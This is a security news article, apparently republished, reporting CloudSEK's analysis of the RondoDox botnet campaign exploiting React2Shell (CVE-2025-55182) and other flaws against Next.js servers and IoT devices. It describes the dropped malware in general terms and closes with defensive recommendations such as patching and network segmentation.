Cybersecurity researchers have revealed details of an ongoing nine-month campaign targeting Internet of Things (IoT) devices and web applications to enroll them in a botnet known as RondoDox.
As of December 2025, CloudSEK has observed activity leveraging the recently revealed flaw in React2Shell (CVE-2025-55182, CVSS score: 10.0) as an initial access vector, CloudSEK said in its analysis.
React2Shell is the name given to a critical security vulnerability in React Server Components (RSC) and Next.js. This vulnerability could allow an unauthenticated attacker to execute remote code on a susceptible device.
According to statistics from the Shadowserver Foundation, as of December 31, 2025, approximately 90,300 instances remain affected by this vulnerability, with 68,400 in the United States, followed by Germany (4,300), France (2,800), and India (1,500).
Emerging in early 2025, RondoDox has expanded by adding new N-day security vulnerabilities to its arsenal, including CVE-2023-1389 and CVE-2025-24893. It is worth noting that the exploitation of React2Shell to spread botnets has previously been noted by Darktrace, Kaspersky, and VulnCheck.
The RondoDox botnet campaign is assessed to have gone through three different stages before exploiting CVE-2025-55182.
March-April 2025 – Initial reconnaissance and manual vulnerability scans April-June 2025 – Daily large-scale vulnerability investigations of web applications such as WordPress, Drupal, Struts2, and IoT devices such as Wavlink routers July-early December 2025 – Large-scale automated deployments conducted hourly
In an attack detected in December 2025, the attackers allegedly initiated a scan to identify vulnerable Next.js servers and then attempted to drop a cryptocurrency miner (‘/nuts/poop’), a botnet loader and health checker (‘/nuts/bolts’), and a Mirai botnet variant (‘/nuts/x86’) onto infected devices.
“/nuts/bolts” is designed to terminate competing malware and coin miners before downloading the main bot binary from a command and control (C2) server. One variant of this tool was found to remove known botnets, Docker-based payloads, artifacts left by previous campaigns, and associated cron jobs while setting persistence using ‘/etc/crontab’.
“It continuously scans /proc to enumerate running executables and kills non-whitelisted processes approximately every 45 seconds, effectively preventing reinfection by rivals,” CloudSEK said.
To reduce the risk posed by this threat, we recommend that organizations update Next.js to a patched version as soon as possible, segment all IoT devices into dedicated VLANs, deploy a web application firewall (WAF), monitor suspicious process execution, and block known C2 infrastructure.
Source link
